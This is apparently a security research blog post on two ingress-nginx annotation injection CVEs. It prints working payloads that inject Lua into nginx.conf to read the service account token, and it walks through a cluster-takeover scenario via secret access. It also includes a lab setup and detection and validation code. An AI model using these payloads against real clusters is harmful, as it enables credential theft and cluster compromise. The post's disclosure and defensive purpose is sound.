Exploiting CVE-2023-5044 and CVE-2023-5043 to Take Over a Kubernetes Cluster

In this blog we explore two new CVEs describing code injection issues in the NGINX ingress controller (ingress-nginx) for Kubernetes. Both issues affect controller versions below 1.9.0, and exploiting them can lead to a complete compromise of the Kubernetes cluster.

CVE-2023-5043 (CVSS score: 7.6) – Code injection via the nginx.ingress.kubernetes.io/configuration-snippet annotation

CVE-2023-5044 (CVSS score: 7.6) – Code injection via the nginx.ingress.kubernetes.io/permanent-redirect annotation

To recreate the issues, we built a vulnerable Kubernetes environment. Details on the different deployments and configurations can be found in the Appendix: Setup vulnerable environment.

Furthermore, Appendix: Tools Used lists the tools used during the setup and exploitation phases, while Appendix: Utility commands lists some handy commands we used while experimenting.







To understand how critical this issue can become, let's first look at the default permissions of the ingress-nginx service account. As the screenshots show, the service account comes with several access rights that could be used to enumerate the Kubernetes cluster.

However, one permission in particular is of great use from an offensive standpoint. By default, the ingress-nginx service account may list and watch secrets across the whole cluster (through its ClusterRole) and, within the ingress-nginx namespace, also get them (through its Role). Because a list response contains the full secret objects, this effectively amounts to read access to every secret in the cluster.
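To make the scope of that access explicit, here is a minimal sketch that evaluates the secret-related rules of the default Role and ClusterRole (transcribed by hand from the appendix and trimmed to the relevant entries) and reports which verbs apply where. The rule dictionaries and the helper name `secret_verbs` are our own illustration, not part of any Kubernetes client library, and `resourceNames` restrictions are ignored for simplicity.

```python
"""Sketch: which verbs does the default ingress-nginx RBAC grant on secrets?

Rule dicts are hand-copied (and trimmed) from the Role and ClusterRole in the
appendix. `secret_verbs` is a hypothetical helper for illustration only.
"""

# Role "ingress-nginx": namespaced, so it only applies inside ingress-nginx.
ROLE_RULES = [
    {"apiGroups": [""], "resources": ["namespaces"], "verbs": ["get"]},
    {"apiGroups": [""],
     "resources": ["configmaps", "pods", "secrets", "endpoints"],
     "verbs": ["get", "list", "watch"]},
]

# ClusterRole "ingress-nginx": bound via a ClusterRoleBinding, so cluster-wide.
CLUSTER_ROLE_RULES = [
    {"apiGroups": [""],
     "resources": ["configmaps", "endpoints", "nodes", "pods", "secrets", "namespaces"],
     "verbs": ["list", "watch"]},
    {"apiGroups": [""], "resources": ["nodes"], "verbs": ["get"]},
]


def secret_verbs(rules):
    """Return the set of verbs that `rules` grant on core-group secrets.

    Simplification: resourceNames restrictions are ignored.
    """
    verbs = set()
    for rule in rules:
        # The core API group is the empty string; "*" matches everything.
        group_ok = any(g in ("", "*") for g in rule.get("apiGroups", []))
        resource_ok = any(r in ("secrets", "*") for r in rule.get("resources", []))
        if group_ok and resource_ok:
            verbs.update(rule.get("verbs", []))
    return verbs


if __name__ == "__main__":
    cluster_wide = secret_verbs(CLUSTER_ROLE_RULES)
    in_namespace = secret_verbs(ROLE_RULES) | cluster_wide
    print("cluster-wide:", sorted(cluster_wide))      # ['list', 'watch']
    print("in ingress-nginx:", sorted(in_namespace))  # ['get', 'list', 'watch']
```

The point of splitting the two rule sets is that scope matters: the Role only adds `get` inside its own namespace, while the ClusterRole's `list` is what exposes secrets everywhere.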

The default configuration can be found here:

Technical Write-Up of CVE-2023-5043 and CVE-2023-5044

Now let us explore the exploitation of both CVEs in detail. To start our research, we used a well-written article about CVE-2023-5044, which includes a proof-of-concept exploit string, to get an idea of what an exploit could look like. Knowing this initial exploit string helped a lot in understanding where the actual issue lies.

Note: To exploit either of these issues, the attacker's service account needs permission to create ingresses in the Kubernetes environment.
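This precondition can be checked against a set of RBAC rules. The sketch below is a minimal illustration, assuming the rules are available as PolicyRule-shaped dicts; the helper name `ingress_write_verbs` and the attacker rules in the example (a reconstruction from the scenario described later in this post) are hypothetical. As a labelled assumption, it also counts `update` and `patch` on ingresses, since those would equally let a subject set annotations, and it only looks at the `networking.k8s.io` API group.

```python
"""Sketch: does a set of RBAC rules let a subject write Ingress objects?

Assumptions (ours): rules are PolicyRule-shaped dicts; only the
networking.k8s.io API group is considered; update/patch are treated like
create because they also allow setting annotations.
"""

INGRESS_WRITE_VERBS = {"create", "update", "patch"}


def ingress_write_verbs(rules):
    """Return the subset of INGRESS_WRITE_VERBS that `rules` grant on ingresses."""
    granted = set()
    for rule in rules:
        groups = set(rule.get("apiGroups", []))
        resources = set(rule.get("resources", []))
        verbs = set(rule.get("verbs", []))
        if not (groups & {"networking.k8s.io", "*"}):
            continue
        # Sub-resources such as "ingresses/status" do not allow editing annotations.
        if not (resources & {"ingresses", "*"}):
            continue
        granted |= (INGRESS_WRITE_VERBS if "*" in verbs else verbs & INGRESS_WRITE_VERBS)
    return granted


if __name__ == "__main__":
    # Hypothetical reconstruction of the compromised pod's ClusterRole.
    attacker_rules = [
        {"apiGroups": ["networking.k8s.io"], "resources": ["ingresses"],
         "verbs": ["get", "list", "create"]},
        {"apiGroups": [""], "resources": ["namespaces", "pods"], "verbs": ["get", "list"]},
    ]
    print(sorted(ingress_write_verbs(attacker_rules)))  # ['create']
```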

Let’s dive into the technical bits!

https://kubernetes.io/docs/concepts/services-networking/ingress/

To set the scene, let's look at the annotation nginx.ingress.kubernetes.io/permanent-redirect. According to the official GitHub documentation, this annotation makes the NGINX ingress controller answer matching requests with a permanent redirect (HTTP status code 301) to the given URL.
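Since the annotation is only meant to carry a URL, a defensive validator can be very strict. The following is a minimal sketch, assuming that only plain http(s) URLs should be accepted; the function name `is_plain_redirect_url` and the set of rejected characters are our own choices for illustration and are not the validation that ingress-nginx itself implements.

```python
from urllib.parse import urlsplit

# Characters that can end an NGINX directive (;), open/close a block ({ }),
# start a quoted string, escape, or separate arguments. Assumed list, for
# illustration only; this is not the check ingress-nginx implements.
FORBIDDEN_CHARS = set(";{}\"'\\ \t\r\n")


def is_plain_redirect_url(value: str) -> bool:
    """Accept only plain http(s) URLs free of NGINX-significant characters."""
    if not value or any(ch in FORBIDDEN_CHARS for ch in value):
        return False
    parts = urlsplit(value)
    return parts.scheme in ("http", "https") and bool(parts.netloc)


if __name__ == "__main__":
    print(is_plain_redirect_url("https://www.covertswarm.com"))              # True
    print(is_plain_redirect_url("https://www.covertswarm.com;}location ~*"))  # False
```

Rejecting characters before parsing matters here: `urlsplit` happily accepts a string with a trailing `;}`, so URL parsing alone would not stop a value that closes the surrounding NGINX block.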











This annotation is attached to an Ingress object in the Kubernetes environment. Let's create an example:

Deploying this enables ingress routing for foo-service and bar-service.





If we now browse to https://localhost/bar/, for example, we can see that the ingress is working: the user is redirected to the defined page.





Let's investigate what actually happens on the NGINX controller. As the redirect is performed by NGINX, we want to look at its configuration files, typically located under /etc/nginx/.





If we now print the contents of nginx.conf and filter for our annotation value (https://www.covertswarm.com), we can see two return 301 directives in this configuration file.





Now, according to the blog post mentioned earlier, an example exploit looked as follows:

```yaml
nginx.ingress.kubernetes.io/permanent-redirect: https://www.covertswarm.com;}location ~* "^/covertswarm(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* '/example' {content_by_lua 'ngx.say("a")'
```

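In NGINX builds that include the Lua module (lua-nginx-module), such as the one shipped in the ingress-nginx controller image, it is possible to run Lua scripts in location directives (see the IBM Aspera reverse proxy Lua scripting documentation).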





If we look closely, we can see that a semicolon and a closing curly bracket (;}) were placed right after our initial value https://www.covertswarm.com. Let's look at some more of the configuration in nginx.conf.



Here we can see, among other things, the configuration for foo-service that we applied through our manifest earlier.

One important point: our payload splits the configuration file at the return 301 https://www.covertswarm.com line. If you look closely, the directive we are closing early still contains more configuration after that line, so we need to make sure that the configuration file stays valid once our payload is injected.

We do this by appending another location directive that is deliberately left unterminated, so that it consumes the remaining closing curly bracket.

```yaml
nginx.ingress.kubernetes.io/permanent-redirect: https://www.covertswarm.com;}location ~* "^/covertswarm(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* '/example' {content_by_lua 'ngx.say("a")'
```

Here we can see what was explained above in action. The first (expected) location directive is closed early by the curly bracket right after our `return 301 https://www.covertswarm.com;` statement. Then another location directive that executes a Lua script is appended, `location ~* "^/covertswarm(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}`, which in turn is followed by an open location directive that keeps the configuration valid: `location ~* '/example' {content_by_lua 'ngx.say("a")'`.

This Lua script runs cat on the /var/run/secrets/kubernetes.io/serviceaccount/token file via io.popen and returns its content to the requesting user.
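The brace bookkeeping described above can be illustrated with a toy model. The sketch below pastes an annotation value, unescaped, into a heavily simplified location block and checks whether the result still has balanced braces. The template string, the placeholder `__REDIRECT__`, and the helper names are our own assumptions, not the real ingress-nginx template, and the injected blocks only return static text.

```python
import re

# Hypothetical, heavily simplified stand-in for the controller's nginx.conf
# template: the annotation value is pasted verbatim, without escaping.
LOCATION_TEMPLATE = (
    "location /bar/ {\n"
    "    return 301 __REDIRECT__;\n"
    "    proxy_pass http://upstream_balancer;\n"
    "}\n"
)


def render(redirect: str) -> str:
    """Substitute the annotation value into the template (no sanitisation)."""
    return LOCATION_TEMPLATE.replace("__REDIRECT__", redirect)


def braces_balanced(conf: str) -> bool:
    """True if every '}' closes an earlier '{' and none remain open."""
    depth = 0
    for ch in conf:
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth < 0:
                return False
    return depth == 0


def count_locations(conf: str) -> int:
    """Count 'location' keywords in the rendered text."""
    return len(re.findall(r"\blocation\b", conf))


if __name__ == "__main__":
    values = {
        "benign": "https://www.covertswarm.com",
        # Closes the block early: the template's own '}' is now left over.
        "break-out only": "https://www.covertswarm.com;} location /injected { return 200 'x';}",
        # Adds an unterminated block that absorbs the leftover '}'.
        "break-out + open block": (
            "https://www.covertswarm.com;} location /injected { return 200 'x';}"
            " location /dangling { return 200 'y'"
        ),
    }
    for name, value in values.items():
        conf = render(value)
        print(f"{name}: locations={count_locations(conf)} balanced={braces_balanced(conf)}")
```

Only the third value yields balanced braces, which mirrors why the payload ends with an open location directive.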







Now, sending a request to the inserted location /covertswarm displays the following:

This is the service account token of the NGINX ingress controller.

Exploiting the nginx.ingress.kubernetes.io/configuration-snippet annotation works in a similar manner to CVE-2023-5044 (nginx.ingress.kubernetes.io/permanent-redirect), with some minor tweaks to the exploit string.



To exploit this, allow-snippet-annotations needs to be set to true. This option defaults to false since v1.9.0; as these issues only affect NGINX controller versions below v1.9.0, this is unlikely to be an obstacle. Still, below you find a patch that allows snippet annotations (it is also set to true in the vulnerable environment setup from the Appendix).

Please read the CVE-2023-5044 (nginx.ingress.kubernetes.io/permanent-redirect) section up to the proof-of-concept to understand how the exploitation works. We pick up from there.

As mentioned above, the exploit string for CVE-2023-5043 differs slightly from the one for CVE-2023-5044.

First and foremost, the nginx.ingress.kubernetes.io/configuration-snippet annotation can be used to add additional configuration to the NGINX location. As in the previous section, where we exploited nginx.conf by appending a location directive under our control, we do exactly the same here.


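Whether snippet annotations are accepted is controlled by the allow-snippet-annotations key in the controller's ConfigMap (ingress-nginx/ingress-nginx-controller, per the `--configmap` argument in the appendix). A minimal defensive sketch, assuming the ConfigMap's `data` section has already been loaded into a Python dict (for example from `kubectl get configmap ... -o json`), could look like this. The function name is hypothetical, and the fallback default simply follows the statement above that the option defaults to false since v1.9.0.

```python
"""Sketch: are snippet annotations enabled on this controller?

`configmap_data` is assumed to be the `data` section of the controller's
ConfigMap as a dict of strings. The version-dependent default follows the
statement in this post (false since v1.9.0).
"""
from typing import Dict, Tuple


def snippets_allowed(configmap_data: Dict[str, str],
                     controller_version: Tuple[int, int, int]) -> bool:
    raw = configmap_data.get("allow-snippet-annotations")
    if raw is None:
        # Key not set: fall back to the version-dependent default.
        return controller_version < (1, 9, 0)
    # ConfigMap values are always strings, so compare textually.
    return raw.strip().lower() == "true"


if __name__ == "__main__":
    print(snippets_allowed({}, (1, 7, 1)))                                      # True
    print(snippets_allowed({"allow-snippet-annotations": "false"}, (1, 7, 1)))  # False
```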

For the configuration we use an example from the Kubernetes ingress-nginx annotation configuration documentation, which looked as follows:

The final manifest looked as follows:



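Applying this configuration to the cluster leads to the following:

Next, we again append our location directive payload:

```yaml
nginx.ingress.kubernetes.io/configuration-snippet: |
  more_set_headers "Request-Id: $req_id";}location ~* "^/covertswarm2(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}
```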


Oddly, when we added the last bit (the open location directive) to keep the configuration file valid, we ran into an error. Investigating the issue did not reveal the cause (or I have since forgotten it). To speed up troubleshooting, we switched to content_by_lua_block (reference), which simply expects the Lua script in a different syntax, namely as a block {}:

```nginx
location ~* '/example2' {content_by_lua_block {ngx.say('hi')}
```

The final exploit string looked as follows:

```nginx
more_set_headers "Request-Id: $req_id";}location ~* "^/covertswarm2(/|$)(.*)" {content_by_lua 'ngx.say(io.popen("cat /var/run/secrets/kubernetes.io/serviceaccount/token"):read("*a"))';}location ~* '/example2' {content_by_lua_block {ngx.say('hi')}
```

This Lua script runs cat on the /var/run/secrets/kubernetes.io/serviceaccount/token file via io.popen and returns its content to the requesting user.

After applying it to the Kubernetes cluster, we can see the injection working just as described for CVE-2023-5044.

If we now browse to /covertswarm2, we are presented with the following:

This is the service account token of the NGINX ingress controller.
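On the defensive side, both payloads leave obvious traces in the Ingress annotations. The following heuristic sketch scans a single Ingress object (as a parsed dict, for example one item from `kubectl get ingress -A -o json`) for the two annotations discussed in this post and flags values containing Lua directives, process execution, the service account credential path, or new location blocks. The indicator list is our own assumption, easy to bypass, and no substitute for upgrading the controller.

```python
"""Heuristic sketch: flag Ingress annotations resembling the payloads above.

The watched annotations come from this post; the indicator patterns are our
own assumption and trivially bypassable (e.g. by obfuscating the Lua code).
"""
import re

WATCHED_ANNOTATIONS = (
    "nginx.ingress.kubernetes.io/configuration-snippet",
    "nginx.ingress.kubernetes.io/permanent-redirect",
)

SUSPICIOUS_PATTERNS = [
    re.compile(r"_by_lua"),                          # content_by_lua, content_by_lua_block, ...
    re.compile(r"io\.popen"),                        # Lua command execution
    re.compile(r"/var/run/secrets/kubernetes\.io"),  # mounted service account credentials
    re.compile(r"\blocation\b"),                     # new location blocks inside an annotation
]


def suspicious_annotations(ingress: dict) -> list:
    """Return (annotation, pattern) pairs that matched on one Ingress object dict."""
    annotations = ingress.get("metadata", {}).get("annotations") or {}
    hits = []
    for key in WATCHED_ANNOTATIONS:
        value = annotations.get(key, "")
        for pattern in SUSPICIOUS_PATTERNS:
            if pattern.search(value):
                hits.append((key, pattern.pattern))
    return hits


if __name__ == "__main__":
    benign = {"metadata": {"annotations": {
        "nginx.ingress.kubernetes.io/configuration-snippet": 'more_set_headers "Request-Id: $req_id";',
    }}}
    print(suspicious_annotations(benign))  # []
```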

Now let's look at what a real attack could look like. We assume the compromise of a pod in the Kubernetes cluster. Its service account does not have any sensitive permissions, but it has get, list and create permissions on ingresses (networking.k8s.io API group).

Furthermore, to reflect realistic enumeration after a compromise, it has limited access to namespaces and pods, defined in a ClusterRole and bound to the service account via a ClusterRoleBinding.



First, an attacker could enumerate the existing namespaces to learn about the environment.





After investigating several pods, they decide to list the pods in the ingress-nginx namespace (the output is filtered for readability, as this environment had been used for earlier experiments).



Aware of the recently released exploits that yield the ingress-nginx controller's service account token, they quickly check the version of the controller:

```shell
kubectl get pod ingress-nginx-controller-86f6dcd696-t76w7 -n ingress-nginx -o yaml | grep -i image:
```
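The version comparison done by eye here can also be scripted, for attackers and defenders alike. A minimal sketch, assuming the image reference has the form `.../controller:vX.Y.Z`, optionally followed by an `@sha256:` digest, parses the tag and compares it with 1.9.0, the boundary named in this post. The function names are hypothetical; tags that are not plain `vX.Y.Z` are reported as unknown rather than guessed.

```python
import re
from typing import Optional, Tuple

# ":v1.7.1" at the end of the reference, optionally followed by "@sha256:<digest>".
TAG_RE = re.compile(r":v(\d+)\.(\d+)\.(\d+)(?:@sha256:[0-9a-f]+)?$")

FIXED_IN = (1, 9, 0)  # first non-vulnerable version, as stated in this post


def controller_version(image: str) -> Optional[Tuple[int, int, int]]:
    """Extract (major, minor, patch) from a controller image reference."""
    match = TAG_RE.search(image)
    if match is None:
        return None  # e.g. ":latest" or a pre-release tag
    return int(match.group(1)), int(match.group(2)), int(match.group(3))


def is_vulnerable(image: str) -> Optional[bool]:
    """True/False if the tag is parseable, None if the version is unknown."""
    version = controller_version(image)
    return None if version is None else version < FIXED_IN


if __name__ == "__main__":
    print(is_vulnerable("registry.k8s.io/ingress-nginx/controller:v1.7.1"))  # True
```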



This revealed that the deployed controller is vulnerable (< v1.9.0). They then output the configuration of the controller pod to learn which ports are exposed in the environment:

```shell
kubectl get pod ingress-nginx-controller-86f6dcd696-t76w7 -n ingress-nginx -o yaml
```

Next, they craft the exploit for the nginx.ingress.kubernetes.io/permanent-redirect annotation, which reflects the service account token back to the requesting user when the path /covertswarm is visited.

They then successfully apply the changes to the ingress object in the cluster, thanks to their create permission on ingresses.networking.k8s.io.

To trigger the exploit, they need to know the IP address of the ingress controller. They obtain it by listing the pods in the ingress-nginx namespace with the wide output format (-o wide).

After applying the ingress and obtaining the IP address, they request the path of the ingress they just created and receive the token of the ingress-nginx service account.

They then check the permissions of the service account they just compromised and find that the default configuration applies, including access to secrets across the cluster.



They export the service account token to the token environment variable (for easier use).





Now, secrets of the whole cluster can be requested and listed (as shown below).

As this is a test environment, only a few secrets are populated. As a proof of concept, database credentials were added to the kube-system namespace to showcase cluster-wide access to secrets and the potential takeover of the whole Kubernetes cluster by exploiting these issues.

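Appendix: Utility commands

```shell
# Delete and re-create a pod from its current manifest
kubectl get pod <pod-name> -n <namespace> -o yaml | kubectl replace --force -f -
```

Example:

```shell
kubectl get pod ingress-nginx-controller-86f6dcd696-z6cd6 -n ingress-nginx -o yaml | kubectl replace --force -f -
```

```shell
# Inspect ingresses
kubectl get ingresses
kubectl get ingress example-ingress

# Apply the exploit manifests
kubectl apply -f cve-2023-5043.yaml
kubectl apply -f cve-2023-5044.yaml
```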

Appendix: Tools Used

Kind – Create a Kubernetes Cluster

Kubectl – Simple Kubernetes API interaction utility

K9s – Manage the Kubernetes Cluster

Vi(m) – We all know it, aye

Appendix: Setup vulnerable environment

reference: https://kind.sigs.k8s.io/docs/user/ingress/

```shell
cat <<EOF | kind create cluster --config=-
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  kubeadmConfigPatches:
  - |
    kind: InitConfiguration
    nodeRegistration:
      kubeletExtraArgs:
        node-labels: "ingress-ready=true"
  extraPortMappings:
  - containerPort: 80
    hostPort: 80
    protocol: TCP
  - containerPort: 443
    hostPort: 443
    protocol: TCP
EOF
```

reference: https://kind.sigs.k8s.io/docs/user/ingress/#using-ingress

```yaml
kind: Pod
apiVersion: v1
metadata:
  name: foo-app
  labels:
    app: foo
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: foo-app
---
kind: Service
apiVersion: v1
metadata:
  name: foo-service
spec:
  selector:
    app: foo
  ports:
  # Default port used by the image
  - port: 8080
---
kind: Pod
apiVersion: v1
metadata:
  name: bar-app
  labels:
    app: bar
spec:
  containers:
  - command:
    - /agnhost
    - netexec
    - --http-port
    - "8080"
    image: registry.k8s.io/e2e-test-images/agnhost:2.39
    name: bar-app
---
kind: Service
apiVersion: v1
metadata:
  name: bar-service
spec:
  selector:
    app: bar
  ports:
  # Default port used by the image
  - port: 8080
```

reference: https://kind.sigs.k8s.io/docs/user/ingress/#ingress-nginx

```shell
wget https://raw.githubusercontent.com/kubernetes/ingress-nginx/main/deploy/static/provider/kind/deploy.yaml
```

```yaml
apiVersion: v1
kind: Namespace
metadata:
  labels:
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
  name: ingress-nginx
---
apiVersion: v1
automountServiceAccountToken: true
kind: ServiceAccount
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx
  namespace: ingress-nginx
---
apiVersion: v1
kind: ServiceAccount
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
  namespace: ingress-nginx
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx
  namespace: ingress-nginx
rules:
- apiGroups:
  - ""
  resources:
  - namespaces
  verbs:
  - get
- apiGroups:
  - ""
  resources:
  - configmaps
  - pods
  - secrets
  - endpoints
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - ""
  resources:
  - services
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses/status
  verbs:
  - update
- apiGroups:
  - networking.k8s.io
  resources:
  - ingressclasses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - coordination.k8s.io
  resourceNames:
  - ingress-nginx-leader
  resources:
  - leases
  verbs:
  - get
  - update
- apiGroups:
  - coordination.k8s.io
  resources:
  - leases
  verbs:
  - create
- apiGroups:
  - ""
  resources:
  - events
  verbs:
  - create
  - patch
- apiGroups:
  - discovery.k8s.io
  resources:
  - endpointslices
  verbs:
  - list
  - watch
  - get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
  namespace: ingress-nginx
rules:
- apiGroups:
  - ""
  resources:
  - secrets
  verbs:
  - get
  - create
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx
rules:
- apiGroups:
  - ""
  resources:
  - configmaps
  - endpoints
  - nodes
  - pods
  - secrets
  - namespaces
  verbs:
  - list
  - watch
- apiGroups:
  - coordination.k8s.io
  resources:
  - leases
  verbs:
  - list
  - watch
- apiGroups:
  - ""
  resources:
  - nodes
  verbs:
  - get
- apiGroups:
  - ""
  resources:
  - services
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - ""
  resources:
  - events
  verbs:
  - create
  - patch
- apiGroups:
  - networking.k8s.io
  resources:
  - ingresses/status
  verbs:
  - update
- apiGroups:
  - networking.k8s.io
  resources:
  - ingressclasses
  verbs:
  - get
  - list
  - watch
- apiGroups:
  - discovery.k8s.io
  resources:
  - endpointslices
  verbs:
  - list
  - watch
  - get
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
rules:
- apiGroups:
  - admissionregistration.k8s.io
  resources:
  - validatingwebhookconfigurations
  verbs:
  - get
  - update
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx
  namespace: ingress-nginx
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: ingress-nginx
subjects:
- kind: ServiceAccount
  name: ingress-nginx
  namespace: ingress-nginx
---
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission
  namespace: ingress-nginx
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: Role
  name: ingress-nginx-admission
subjects:
- kind: ServiceAccount
  name: ingress-nginx-admission
  namespace: ingress-nginx
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  labels:
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: ingress-nginx
subjects:
- kind: ServiceAccount
  name: ingress-nginx
  namespace: ingress-nginx
```

```yaml
  ipFamilies:
  - IPv4
  ipFamilyPolicy: SingleStack
  ports:
  - appProtocol: http
    name: http
    port: 80
    protocol: TCP
    targetPort: http
  - appProtocol: https
    name: https
    port: 443
    protocol: TCP
    targetPort: https
  selector:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
  type: NodePort
---
apiVersion: v1
kind: Service
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-controller-admission
  namespace: ingress-nginx
spec:
  ports:
  - appProtocol: https
    name: https-webhook
    port: 443
    targetPort: webhook
  selector:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
  type: ClusterIP
---
apiVersion: apps/v1
kind: Deployment
metadata:
  labels:
    app.kubernetes.io/component: controller
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-controller
  namespace: ingress-nginx
spec:
  minReadySeconds: 0
  revisionHistoryLimit: 10
  selector:
    matchLabels:
      app.kubernetes.io/component: controller
      app.kubernetes.io/instance: ingress-nginx
      app.kubernetes.io/name: ingress-nginx
  strategy:
    rollingUpdate:
      maxUnavailable: 1
    type: RollingUpdate
  template:
    metadata:
      labels:
        app.kubernetes.io/component: controller
        app.kubernetes.io/instance: ingress-nginx
        app.kubernetes.io/name: ingress-nginx
        app.kubernetes.io/part-of: ingress-nginx
        app.kubernetes.io/version: 1.7.1
    spec:
      containers:
      - args:
        - /nginx-ingress-controller
        - --election-id=ingress-nginx-leader
        - --controller-class=k8s.io/ingress-nginx
        - --ingress-class=nginx
        - --configmap=$(POD_NAMESPACE)/ingress-nginx-controller
        - --validating-webhook=:8443
        - --validating-webhook-certificate=/usr/local/certificates/cert
        - --validating-webhook-key=/usr/local/certificates/key
        - --watch-ingress-without-class=true
        - --publish-status-address=localhost
        env:
        - name: POD_NAME
          valueFrom:
            fieldRef:
              fieldPath: metadata.name
        - name: POD_NAMESPACE
          valueFrom:
            fieldRef:
              fieldPath: metadata.namespace
        - name: LD_PRELOAD
          value: /usr/local/lib/libmimalloc.so
        image: registry.k8s.io/ingress-nginx/controller:v1.7.1
        imagePullPolicy: IfNotPresent
        lifecycle:
          preStop:
            exec:
              command:
              - /wait-shutdown
        livenessProbe:
          failureThreshold: 5
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        name: controller
        ports:
        - containerPort: 80
          hostPort: 80
          name: http
          protocol: TCP
        - containerPort: 443
          hostPort: 443
          name: https
          protocol: TCP
        - containerPort: 8443
          name: webhook
          protocol: TCP
        readinessProbe:
          failureThreshold: 3
          httpGet:
            path: /healthz
            port: 10254
            scheme: HTTP
          initialDelaySeconds: 10
          periodSeconds: 10
          successThreshold: 1
          timeoutSeconds: 1
        resources:
          requests:
            cpu: 100m
            memory: 90Mi
        securityContext:
          allowPrivilegeEscalation: true
          capabilities:
            add:
            - NET_BIND_SERVICE
            drop:
            - ALL
          runAsUser: 101
        volumeMounts:
        - mountPath: /usr/local/certificates/
          name: webhook-cert
          readOnly: true
      dnsPolicy: ClusterFirst
      nodeSelector:
        ingress-ready: "true"
        kubernetes.io/os: linux
      serviceAccountName: ingress-nginx
      terminationGracePeriodSeconds: 0
      tolerations:
      - effect: NoSchedule
        key: node-role.kubernetes.io/master
        operator: Equal
      - effect: NoSchedule
        key: node-role.kubernetes.io/control-plane
        operator: Equal
      volumes:
      - name: webhook-cert
        secret:
          secretName: ingress-nginx-admission
---
apiVersion: batch/v1
kind: Job
metadata:
  labels:
    app.kubernetes.io/component: admission-webhook
    app.kubernetes.io/instance: ingress-nginx
    app.kubernetes.io/name: ingress-nginx
    app.kubernetes.io/part-of: ingress-nginx
    app.kubernetes.io/version: 1.7.1
  name: ingress-nginx-admission-create
  namespace: ingress-nginx
spec:
  template:
    metadata:
      labels:
        app.kubernetes.io/component: admission-webhook
        app.kubernetes.io/instance: ingress-nginx
        app.kubernetes.io/name: ingress-nginx
        app.kubernetes.io/part-of: ingress-nginx
